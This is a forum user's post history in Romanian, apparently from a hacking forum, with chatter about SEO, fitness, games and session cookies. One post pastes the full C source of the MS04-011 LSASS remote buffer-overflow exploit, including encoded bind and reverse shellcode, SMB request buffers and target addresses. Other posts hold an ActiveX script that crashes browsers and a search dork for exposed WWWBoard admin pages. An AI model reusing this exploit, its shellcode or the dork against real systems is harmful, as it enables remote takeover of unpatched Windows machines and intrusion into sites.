axxl2006
-
Posts
50 -
Joined
-
Last visited
Everything posted by axxl2006
-
Trebuie sa obtii cat mai multe "voturi", asta insemnand sa ai link pe un site cu PR mai mare. Daca nu ai bani de reclama incearca un link exchange Acu "hackati" si voi ebay.com si puneti link-ul acolo :@
-
<div class='quotetop'>QUOTE("Thunder")</div> :@ ..acum scuza-ma...din cate stiam administratorul face legea :@
-
<div class='quotetop'>QUOTE("Thunder")</div> Sigur, nici nu o sa-si dea seama administratorul ca cineva are server de CS pe router-ul lui :?
-
Bruneta cu ochii verzi ?
-
Eu nu fac burta nici sa ma bati :@ dar am si un stil de viata sportiv. De burta e cel mai greu sa scapi. Nu va incredeti in creme, diete si prostii. Sala este singura cale, multa munca si rabdare
-
<div class='quotetop'>QUOTE("icerw")</div> I se mai spune si Linux Backdoor...
-
System Root on Windows XP from any Local Account
axxl2006 replied to YonutzW's topic in Tutoriale video
Trick-ul e vechi si merge doar daca esti Administrator. Poti sa treci din Administrator in SYSTEM. -
este doar o parte din codul sursa a worm-ului Sasser. Dupa cum va puteti da seama este doar partea prin care exploateaza vulnerabilitatea lsass. lipsesc codurile sursa pt serverul ftp, instalarea lui si cheile din registry, copierea lui pe pc-ul victimei, generarea unui ip random si exploatarea lui...si altele, depinde de versiune.
-
pai asta ziceam si eu la baieti. Dar daca dai log-out, sesiunea expira si automat cookie-ul nu mei e valabil
-
Din pacate vad ca nu mai functioneaza. Acu ceva timp mergea. Rog un moderator sa mute topicul in tomberon
-
#include <stdio.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <sys/types.h> #include <arpa/inet.h> // reverse shellcode unsigned char reverseshell[] = "xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA" "xEBx05xE8xEBxFFxFFxFF" "x70x62x99x99x99xC6xFDx38xA9x99x99x99x12xD9x95x12" "xE9x85x34x12xF1x91x12x6ExF3x9DxC0x71x02x99x99x99" "x7Bx60xF1xAAxABx99x99xF1xEExEAxABxC6xCDx66x8Fx12" "x71xF3x9DxC0x71x1Bx99x99x99x7Bx60x18x75x09x98x99" "x99xCDxF1x98x98x99x99x66xCFx89xC9xC9xC9xC9xD9xC9" "xD9xC9x66xCFx8Dx12x41xF1xE6x99x99x98xF1x9Bx99x9D" "x4Bx12x55xF3x89xC8xCAx66xCFx81x1Cx59xECxD3xF1xFA" "xF4xFDx99x10xFFxA9x1Ax75xCDx14xA5xBDxF3x8CxC0x32" "x7Bx64x5FxDDxBDx89xDDx67xDDxBDxA4x10xC5xBDxD1x10" "xC5xBDxD5x10xC5xBDxC9x14xDDxBDx89xCDxC9xC8xC8xC8" "xF3x98xC8xC8x66xEFxA9xC8x66xCFx9Dx12x55xF3x66x66" "xA8x66xCFx91xCAx66xCFx85x66xCFx95xC8xCFx12xDCxA5" "x12xCDxB1xE1x9Ax4CxCBx12xEBxB9x9Ax6CxAAx50xD0xD8" "x34x9Ax5CxAAx42x96x27x89xA3x4FxEDx91x58x52x94x9A" "x43xD9x72x68xA2x86xECx7ExC3x12xC3xBDx9Ax44xFFx12" "x95xD2x12xC3x85x9Ax44x12x9Dx12x9Ax5Cx32xC7xC0x5A" "x71x99x66x66x66x17xD7x97x75xEBx67x2Ax8Fx34x40x9C" "x57x76x57x79xF9x52x74x65xA2x40x90x6Cx34x75x60x33" "xF9x7ExE0x5FxE0"; // bind shellcode unsigned char bindshell[] = "xEBx10x5Ax4Ax33xC9x66xB9x7Dx01x80x34x0Ax99xE2xFA" "xEBx05xE8xEBxFFxFFxFF" "x70x95x98x99x99xC3xFDx38xA9x99x99x99x12xD9x95x12" "xE9x85x34x12xD9x91x12x41x12xEAxA5x12xEDx87xE1x9A" "x6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8x12xA6" "x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5Ex9D" "xDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A" "x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58" "x12x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0" "x71x1Ex99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12x41" "xF3x9CxC0x71xEDx99x99x99xC9xC9xC9xC9xF3x98xF3x9B" "x66xCEx75x12x41x5Ex9Ex9Bx99x9Dx4BxAAx59x10xDEx9D" "xF3x89xCExCAx66xCEx69xF3x98xCAx66xCEx6DxC9xC9xCA" "x66xCEx61x12x49x1Ax75xDDx12x6DxAAx59xF3x89xC0x10" "x9Dx17x7Bx62x10xCFxA1x10xCFxA5x10xCFxD9xFFx5ExDF" "xB5x98x98x14xDEx89xC9xCFxAAx50xC8xC8xC8xF3x98xC8" "xC8x5ExDExA5xFAxF4xFDx99x14xDExA5xC9xC8x66xCEx79" "xCBx66xCEx65xCAx66xCEx65xC9x66xCEx7DxAAx59x35x1C" "x59xECx60xC8xCBxCFxCAx66x4BxC3xC0x32x7Bx77xAAx59" "x5Ax71x76x67x66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD" "xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC" "xEAxEAxD8x99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5" "xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8x99xEExEAxABxC6" "xAAxABx99xCExCAxD8xCAxF6xFAxF2xFCxEDxD8x99xFBxF0" "xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFAxFAxFCxE9xED" "x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99"; char req1[] = "x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE" "x00x00x00x00x00x62x00x02x50x43x20x4Ex45x54x57x4F" "x52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02" "x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6F" "x77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70" "x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30" "x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54" "x20x4Cx4Dx20x30x2Ex31x32x00"; char req2[] = "x00x00x00xA4xFFx53x4Dx42x73x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE" "x00x00x10x00x0CxFFx00xA4x00x04x11x0Ax00x00x00x00" "x00x00x00x20x00x00x00x00x00xD4x00x00x80x69x00x4E" "x54x4Cx4Dx53x53x50x00x01x00x00x00x97x82x08xE0x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00" "x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00" "x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00" "x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00" "x2Ex00x30x00x00x00x00x00"; char req3[] = "x00x00x00xDAxFFx53x4Dx42x73x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE" "x00x08x20x00x0CxFFx00xDAx00x04x11x0Ax00x00x00x00" "x00x00x00x57x00x00x00x00x00xD4x00x00x80x9Fx00x4E" "x54x4Cx4Dx53x53x50x00x03x00x00x00x01x00x01x00x46" "x00x00x00x00x00x00x00x47x00x00x00x00x00x00x00x40" "x00x00x00x00x00x00x00x40x00x00x00x06x00x06x00x40" "x00x00x00x10x00x10x00x47x00x00x00x15x8Ax88xE0x48" "x00x4Fx00x44x00x00x81x19x6Ax7AxF2xE4x49x1Cx28xAF" "x30x25x74x10x67x53x57x00x69x00x6Ex00x64x00x6Fx00" "x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00" "x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00" "x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00" "x30x00x20x00x35x00x2Ex00x30x00x00x00x00x00"; char req4[] = "x00x00x00x5CxFFx53x4Dx42x75x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE" "x00x08x30x00x04xFFx00x5Cx00x08x00x01x00x31x00x00" "x5Cx00x5Cx00x31x00x39x00x32x00x2Ex00x31x00x36x00" "x38x00x2Ex00x31x00x2Ex00x32x00x31x00x30x00x5Cx00" "x49x00x50x00x43x00x24" "x00x00x00x3Fx3Fx3Fx3Fx3Fx00"; char req5[] = "x00x00x00x64xFFx53x4Dx42xA2x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04" "x00x08x40x00x18xFFx00xDExDEx00x0Ex00x16x00x00x00" "x00x00x00x00x9Fx01x02x00x00x00x00x00x00x00x00x00" "x00x00x00x00x03x00x00x00x01x00x00x00x40x00x00x00" "x02x00x00x00x03x11x00x00x5Cx00x6Cx00x73x00x61x00" "x72x00x70x00x63x00x00x00"; char req6[] = "x00x00x00x9CxFFx53x4Dx42x25x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04" "x00x08x50x00x10x00x00x48x00x00x00x00x04x00x00x00" "x00x00x00x00x00x00x00x00x00x54x00x48x00x54x00x02" "x00x26x00x00x40x59x00x10x5Cx00x50x00x49x00x50x00" "x45x00x5Cx00x00x00x00x00x05x00x0Bx03x10x00x00x00" "x48x00x00x00x01x00x00x00xB8x10xB8x10x00x00x00x00" "x01x00x00x00x00x00x01x00x6Ax28x19x39x0CxB1xD0x11" "x9BxA8x00xC0x4FxD9x2ExF5x00x00x00x00x04x5Dx88x8A" "xEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00"; char req7[] = "x00x00x0CxF4xFFx53x4Dx42x25x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04" "x00x08x60x00x10x00x00xA0x0Cx00x00x00x04x00x00x00" "x00x00x00x00x00x00x00x00x00x54x00xA0x0Cx54x00x02" "x00x26x00x00x40xB1x0Cx10x5Cx00x50x00x49x00x50x00" "x45x00x5Cx00x00x00x00x00x05x00x00x03x10x00x00x00" "xA0x0Cx00x00x01x00x00x00x88x0Cx00x00x00x00x09x00" "xECx03x00x00x00x00x00x00xECx03x00x00"; // room for shellcode here ... char shit1[] = "x95x14x40x00x03x00x00x00x7Cx70x40x00x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x7Cx70x40x00" "x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00" "x7Cx70x40x00x01x00x00x00x00x00x00x00x01x00x00x00" "x00x00x00x00x7Cx70x40x00x01x00x00x00x00x00x00x00" "x01x00x00x00x00x00x00x00x78x85x13x00xABx5BxA6xE9"; char req8[] = "x00x00x10xF8xFFx53x4Dx42x2Fx00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFE" "x00x08x60x00x0ExFFx00xDExDEx00x40x00x00x00x00xFF" "xFFxFFxFFx08x00xB8x10x00x00xB8x10x40x00x00x00x00" "x00xB9x10xEEx05x00x00x01x10x00x00x00xB8x10x00x00" "x01x00x00x00x0Cx20x00x00x00x00x09x00xADx0Dx00x00" "x00x00x00x00xADx0Dx00x00"; // room for shellcode here ... char req9[] = "x00x00x0FxD8xFFx53x4Dx42x25x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x08x18x01" "x00x08x70x00x10x00x00x84x0Fx00x00x00x04x00x00x00" "x00x00x00x00x00x00x00x00x00x54x00x84x0Fx54x00x02" "x00x26x00x00x40x95x0Fx00x5Cx00x50x00x49x00x50x00" "x45x00x5Cx00x00x00x00x00x05x00x00x02x10x00x00x00" "x84x0Fx00x00x01x00x00x00x6Cx0Fx00x00x00x00x09x00"; char shit3[] = "x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00" "x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00" "x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00" "x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00" "x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00" "x01x00x00x00x00x00x00x00x9AxA8x40x00x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x9AxA8x40x00" "x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"; #define LEN 3500 #define BUFSIZE 2000 #define NOP 0x90 struct targets { int num; char name[50]; long jmpaddr; } ttarget[]= { { 0, "WinXP Professional   [universal] lsass.exe ", 0x01004600 }, // jmp esp addr { 1, "Win2k Professional   [universal] netrap.dll", 0x7515123c }, // jmp ebx addr { 2, "Win2k Advanced Server [sP4]    netrap.dll", 0x751c123c }, // jmp ebx addr }; void usage(char *prog) { int i; printf("Usage:nn"); printf("%s <target> <victim IP> <bindport> [connectback IP] [options]nn", prog); printf("Targets:n"); for (i=0; i<3; i++) printf(" %d [0x%.8x]: %sn", ttarget[i].num, ttarget[i].jmpaddr, ttarget[i].name); printf("nOptions:n"); printf(" -t: Detect remote OS:n"); printf(" Windows 5.1 - WinXPn"); printf(" Windows 5.0 - Win2knn"); exit(0); } int main(int argc, char *argv[]) { int i; int opt = 0; char *target; char hostipc[40]; char hostipc2[40*2]; unsigned short port; unsigned long ip; unsigned char *sc; char buf[LEN+1]; char sendbuf[(LEN+1)*2]; char req4u[sizeof(req4)+20]; char screq[bUFSIZE+sizeof(req7)+1500+440]; char screq2k[4348+4060]; char screq2k2[4348+4060]; char recvbuf[1600]; char strasm[]="x66x81xECx1Cx07xFFxE4"; char strBuffer[bUFSIZE]; unsigned int targetnum = 0; int len, sockfd; short dport = 445; struct hostent *he; struct sockaddr_in their_addr; char smblen; char unclen; printf("nMS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1n"); printf("--- Coded by .::[ houseofdabus ]::. ---nn"); if (argc < 4) { usage(argv[0]); } target = argv[2]; sprintf((char *)hostipc,"%sipc$", target); for (i=0; i<40; i++) { hostipc2[i*2] = hostipc[i]; hostipc2[i*2+1] = 0; } memcpy(req4u, req4, sizeof(req4)-1); memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2); memcpy(req4u+47+strlen(hostipc)*2, req4+87, 9); smblen = 52+(char)strlen(hostipc)*2; memcpy(req4u+3, &smblen, 1); unclen = 9 + (char)strlen(hostipc)*2; memcpy(req4u+45, &unclen, 1); if (argc > 4) if (!memcmp(argv[4], "-t", 2)) opt = 1; if ( (argc > 4) && !opt ) { port = htons(atoi(argv[3]))^(unsigned short int)0x9999; ip = inet_addr(argv[4])^(unsigned long int)0x99999999; memcpy(&reverseshell[118], &port, 2); memcpy(&reverseshell[111], &ip, 4); sc = reverseshell; } else { port = htons(atoi(argv[3]))^(unsigned short int)0x9999; memcpy(&bindshell[176], &port, 2); sc = bindshell; } if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) { memset(buf, NOP, LEN); //memcpy(&buf[2020], "x3cx12x15x75", 4); memcpy(&buf[2020], &ttarget[atoi(argv[1])].jmpaddr, 4); memcpy(&buf[2036], sc, strlen(sc)); memcpy(&buf[2840], "xebx06xebx06", 4); memcpy(&buf[2844], &ttarget[atoi(argv[1])].jmpaddr, 4); // jmp ebx addr //memcpy(&buf[2844], "x3cx12x15x75", 4); // jmp ebx addr memcpy(&buf[2856], sc, strlen(sc)); for (i=0; i<LEN; i++) { sendbuf[i*2] = buf[i]; sendbuf[i*2+1] = 0; } sendbuf[LEN*2]=0; sendbuf[LEN*2+1]=0; memset(screq2k, 0x31, (BUFSIZE+sizeof(req7)+1500)*2); memset(screq2k2, 0x31, (BUFSIZE+sizeof(req7)+1500)*2); } else { memset(strBuffer, NOP, BUFSIZE); memcpy(strBuffer+160, sc, strlen(sc)); memcpy(strBuffer+1980, strasm, strlen(strasm)); *(long *)&strBuffer[1964]=ttarget[atoi(argv[1])].jmpaddr; } memset(screq, 0x31, BUFSIZE+sizeof(req7)+1500); if ((he=gethostbyname(argv[2])) == NULL) { // get the host info perror("[-] gethostbyname "); exit(1); } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(dport); their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(their_addr.sin_zero), '
-
intitle:"WWWAdmin For WWWBoard"
-
ip de retea, dar nu va lua ip-ul public al altcuiva
-
Nu cred ca mai exista vre-un isp unde sa mai mearga asa ceva... Poate la din-alea mici de cartier, unde adminu e un pustan de 16 ani
-
As originally urged by the FBI, and still urged by prominent security experts, our UnPnP utility easily disables the dangerous, and almost always unnecessary, Universal Plug and Play service. If you don't need it, turn it off. (For ALL versions of Windows.) The Universal Plug and Play service (UPnP), which is installed and running in all versions of Windows XP — and may be loaded into Windows 98 and ME — essentially turns every one of those systems into a wide-open Internet server. This server listens for TCP connections on port 5000 and for UDP 'datagram' packets arriving on port 1900. This allows malicious hackers (or high-speed Internet worms) located anywhere in the world to scan for, and locate, individual Windows UPnP-equipped machines. Any vulnerabilities — known today or discovered tomorrow — can then be rapidly exploited. http://www.grc.com/files/unpnp.exe
-
DCOMbobulator allows any Windows user to easily verify the effectiveness of Microsoft's recent critical DCOM patch. Confirmed reports have demonstrated that the patch is not always effective in eliminating DCOM's remote exploit vulnerability. But more importantly, since DCOM is a virtually unused and unneeded facility, the DCOMbobulator allows any Windows user to easily disable DCOM for significantly greater security. http://www.grc.com/files/DCOMbob.exe
-
Daca nu ma insel, inlocuirea cookies nu prea are treaba cu ce fel de forum-uri folositi. Daca sesiunea a fost inchisa(adica am dat log-out), cookie-ul acela nu mai e valabil. Astept sa confirme maestrul kwerln, ca el cred ca e mai documentat in asa ceva
-
<html><body><script> function Demo() { var a = new ActiveXObject("Internet.HHCtrl.1"); a.Click(); } </script> Clicking the button below may crash your browser! <input type='button' onClick='Demo()' value='Start Demo!'> </body></html>
-
Sa intru-un clan nu m-ar deranja..dar cu siguranta nu am timp de clan war-uri :@
-
Mai ai pana acolo...dar ca sa-ti dau un hint, trebuie sa stii Assembly, low level language....adica trebuie sa stii cum functioneaza un calculator la un nivel foarte scazut, procesorul si memoria in general.
-
Singurele jocuri pe care le mai joc sunt starcraft si CS. In ultimul timp am jucat CS, dar ma enerveaza aia care intra cu coduri si ies..
-
"cand o sa fiu mare o sa ma lase sa-i conduc masina.." :@
-
Guta salamu de peste minune - mor dusmanii ca vede ca eu avem fete si leii grei
-
Nu ai observat ca si eu ma distram :@ ...nu ca as fi mintit despre ceva..... Vorbind la modul serios, era ceva apropiat de descrierea mea, cu ochi caprui, par saten, 1,72-73. Mergea la concursuri dinalea de stele ...si eu tot radeam de ea :@
-
Renunt, ca nu mai are rost...sper sa nu ma mai contrazici si acum...